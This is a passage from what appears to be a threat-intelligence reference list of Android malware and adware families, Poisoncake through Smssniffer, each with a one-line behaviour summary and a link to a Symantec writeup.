<h3 id="_poisoncake"><a class="anchor" href="#_poisoncake"></a><a class="link" href="#_poisoncake">Poisoncake</a></h3>
<div class="paragraph">
<p>Poisoncake is a Trojan horse for Android devices that opens a back door on the compromised device. It may also download potentially malicious files and steal information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 305. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-010610-0726-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-010610-0726-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pontiflex"><a class="anchor" href="#_pontiflex"></a><a class="link" href="#_pontiflex">Pontiflex</a></h3>
<div class="paragraph">
<p>Pontiflex is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 306. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-0946-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-0946-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_positmob"><a class="anchor" href="#_positmob"></a><a class="link" href="#_positmob">Positmob</a></h3>
<div class="paragraph">
<p>Positmob is a Trojan horse program for Android devices that sends SMS messages to premium rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 307. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111409-1556-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111409-1556-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_premiumtext"><a class="anchor" href="#_premiumtext"></a><a class="link" href="#_premiumtext">Premiumtext</a></h3>
<div class="paragraph">
<p>Premiumtext is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers. These Trojans will often be repackaged versions of genuine Android software packages, often distributed outside the Android Marketplace.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 308. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-080213-5308-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-080213-5308-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pris"><a class="anchor" href="#_pris"></a><a class="link" href="#_pris">Pris</a></h3>
<div class="paragraph">
<p>Pris is a Trojan horse for Android devices that silently downloads a malicious application and attempts to open a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 309. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-061820-5638-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-061820-5638-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qdplugin"><a class="anchor" href="#_qdplugin"></a><a class="link" href="#_qdplugin">Qdplugin</a></h3>
<div class="paragraph">
<p>Qdplugin is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 310. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-102510-3330-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-102510-3330-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qicsomos"><a class="anchor" href="#_qicsomos"></a><a class="link" href="#_qicsomos">Qicsomos</a></h3>
<div class="paragraph">
<p>Qicsomos is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 311. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-011007-2223-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-011007-2223-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qitmo"><a class="anchor" href="#_qitmo"></a><a class="link" href="#_qitmo">Qitmo</a></h3>
<div class="paragraph">
<p>Qitmo is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 312. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030716-4923-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030716-4923-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rabbhome"><a class="anchor" href="#_rabbhome"></a><a class="link" href="#_rabbhome">Rabbhome</a></h3>
<div class="paragraph">
<p>Rabbhome is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 313. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-053007-3750-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-053007-3750-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_repane"><a class="anchor" href="#_repane"></a><a class="link" href="#_repane">Repane</a></h3>
<div class="paragraph">
<p>Repane is a Trojan horse for Android devices that steals information and sends SMS messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 314. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-090411-5052-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-090411-5052-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reputation_1"><a class="anchor" href="#_reputation_1"></a><a class="link" href="#_reputation_1">Reputation.1</a></h3>
<div class="paragraph">
<p>Reputation.1 is a detection for Android files based on analysis performed by Norton Mobile Insight.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 315. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-022612-2619-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-022612-2619-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reputation_2"><a class="anchor" href="#_reputation_2"></a><a class="link" href="#_reputation_2">Reputation.2</a></h3>
<div class="paragraph">
<p>Reputation.2 is a detection for Android files based on analysis performed by Norton Mobile Insight.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 316. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-2629-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-2629-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reputation_3"><a class="anchor" href="#_reputation_3"></a><a class="link" href="#_reputation_3">Reputation.3</a></h3>
<div class="paragraph">
<p>Reputation.3 is a detection for Android files based on analysis performed by Norton Mobile Insight.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 317. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-3126-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-3126-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_revmob"><a class="anchor" href="#_revmob"></a><a class="link" href="#_revmob">RevMob</a></h3>
<div class="paragraph">
<p>RevMob is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 318. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040308-0502-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040308-0502-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_roidsec"><a class="anchor" href="#_roidsec"></a><a class="link" href="#_roidsec">Roidsec</a></h3>
<div class="paragraph">
<p>Roidsec is a Trojan horse for Android devices that steals confidential information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 319. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-052022-1227-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-052022-1227-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rootcager"><a class="anchor" href="#_rootcager"></a><a class="link" href="#_rootcager">Rootcager</a></h3>
<div class="paragraph">
<p>Rootcager is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 320. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-030212-1438-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-030212-1438-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rootnik"><a class="anchor" href="#_rootnik"></a><a class="link" href="#_rootnik">Rootnik</a></h3>
<div class="paragraph">
<p>Rootnik is a Trojan horse for Android devices that steals information and downloads additional apps.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 321. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-062710-0328-99">https://www.symantec.com/security_response/writeup.jsp?docid=2016-062710-0328-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rufraud"><a class="anchor" href="#_rufraud"></a><a class="link" href="#_rufraud">Rufraud</a></h3>
<div class="paragraph">
<p>Rufraud is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 322. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-121306-2304-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-121306-2304-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rusms"><a class="anchor" href="#_rusms"></a><a class="link" href="#_rusms">Rusms</a></h3>
<div class="paragraph">
<p>Rusms is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 323. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-061711-5009-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-061711-5009-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_samsapo"><a class="anchor" href="#_samsapo"></a><a class="link" href="#_samsapo">Samsapo</a></h3>
<div class="paragraph">
<p>Samsapo is a worm for Android devices that spreads by sending SMS messages to all contacts stored on the compromised device. It also opens a back door and downloads files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 324. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-050111-1908-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-050111-1908-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sandorat"><a class="anchor" href="#_sandorat"></a><a class="link" href="#_sandorat">Sandorat</a></h3>
<div class="paragraph">
<p>Sandorat is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 325. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-110720-2146-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-110720-2146-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sberick"><a class="anchor" href="#_sberick"></a><a class="link" href="#_sberick">Sberick</a></h3>
<div class="paragraph">
<p>Sberick is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 326. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-071014-2146-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-071014-2146-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scartibro"><a class="anchor" href="#_scartibro"></a><a class="link" href="#_scartibro">Scartibro</a></h3>
<div class="paragraph">
<p>Scartibro is a Trojan horse for Android devices that locks the compromised device and asks the user to pay in order to unlock it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 327. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-080718-2038-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-080718-2038-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scipiex"><a class="anchor" href="#_scipiex"></a><a class="link" href="#_scipiex">Scipiex</a></h3>
<div class="paragraph">
<p>Scipiex is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 328. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-100814-4702-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-100814-4702-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_selfmite"><a class="anchor" href="#_selfmite"></a><a class="link" href="#_selfmite">Selfmite</a></h3>
<div class="paragraph">
<p>Selfmite is a worm for Android devices that spreads through SMS messages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 329. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-070111-5857-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-070111-5857-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_selfmite_b"><a class="anchor" href="#_selfmite_b"></a><a class="link" href="#_selfmite_b">Selfmite.B</a></h3>
<div class="paragraph">
<p>Selfmite.B is a worm for Android devices that displays ads on the compromised device. It spreads through SMS messages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 330. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-101013-4717-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-101013-4717-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sellaring"><a class="anchor" href="#_sellaring"></a><a class="link" href="#_sellaring">SellARing</a></h3>
<div class="paragraph">
<p>SellARing is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 331. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-3157-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-3157-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_senddroid"><a class="anchor" href="#_senddroid"></a><a class="link" href="#_senddroid">SendDroid</a></h3>
<div class="paragraph">
<p>SendDroid is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 332. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-2111-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-2111-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_simhosy"><a class="anchor" href="#_simhosy"></a><a class="link" href="#_simhosy">Simhosy</a></h3>
<div class="paragraph">
<p>Simhosy is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 333. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-061013-3955-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-061013-3955-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_simplocker"><a class="anchor" href="#_simplocker"></a><a class="link" href="#_simplocker">Simplocker</a></h3>
<div class="paragraph">
<p>Simplocker is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 334. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-060610-5533-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-060610-5533-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_simplocker_b"><a class="anchor" href="#_simplocker_b"></a><a class="link" href="#_simplocker_b">Simplocker.B</a></h3>
<div class="paragraph">
<p>Simplocker.B is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 335. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-072317-1950-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-072317-1950-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skullkey"><a class="anchor" href="#_skullkey"></a><a class="link" href="#_skullkey">Skullkey</a></h3>
<div class="paragraph">
<p>Skullkey is a Trojan horse for Android devices that gives the attacker remote control of the compromised device to perform malicious activity.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 336. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-072322-5422-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-072322-5422-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smaato"><a class="anchor" href="#_smaato"></a><a class="link" href="#_smaato">Smaato</a></h3>
<div class="paragraph">
<p>Smaato is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 337. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052622-1755-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052622-1755-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smbcheck"><a class="anchor" href="#_smbcheck"></a><a class="link" href="#_smbcheck">Smbcheck</a></h3>
<div class="paragraph">
<p>Smbcheck is a hacktool for Android devices that can trigger a Server Message Block version 2 (SMBv2) vulnerability and may cause the target computer to crash.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 338. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-5634-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-5634-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smsblocker"><a class="anchor" href="#_smsblocker"></a><a class="link" href="#_smsblocker">Smsblocker</a></h3>
<div class="paragraph">
<p>Smsblocker is a generic detection for threats on Android devices that block the transmission of SMS messages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 339. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-081607-4001-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-081607-4001-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smsbomber"><a class="anchor" href="#_smsbomber"></a><a class="link" href="#_smsbomber">Smsbomber</a></h3>
<div class="paragraph">
<p>Smsbomber is a program that can be used to send messages to contacts on the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 340. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-112611-5837-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-112611-5837-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smslink"><a class="anchor" href="#_smslink"></a><a class="link" href="#_smslink">Smslink</a></h3>
<div class="paragraph">
<p>Smslink is a Trojan horse for Android devices that may send malicious SMS messages from the compromised device. It may also display advertisements.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 341. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-112600-3035-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-112600-3035-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smspacem"><a class="anchor" href="#_smspacem"></a><a class="link" href="#_smspacem">Smspacem</a></h3>
<div class="paragraph">
<p>Smspacem is a Trojan horse that may send SMS messages from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 342. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-052310-1322-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-052310-1322-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smsreplicator"><a class="anchor" href="#_smsreplicator"></a><a class="link" href="#_smsreplicator">SMSReplicator</a></h3>
<div class="paragraph">
<p>SMSReplicator is a spying utility that will secretly transmit incoming SMS messages to another phone of the installer&#8217;s choice.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 343. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2010-110214-1252-99">https://www.symantec.com/security_response/writeup.jsp?docid=2010-110214-1252-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smssniffer"><a class="anchor" href="#_smssniffer"></a><a class="link" href="#_smssniffer">Smssniffer</a></h3>
<div class="paragraph">
<p>Smssniffer is a Trojan horse that intercepts SMS messages on Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 344. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-071108-3626-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-071108-3626-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
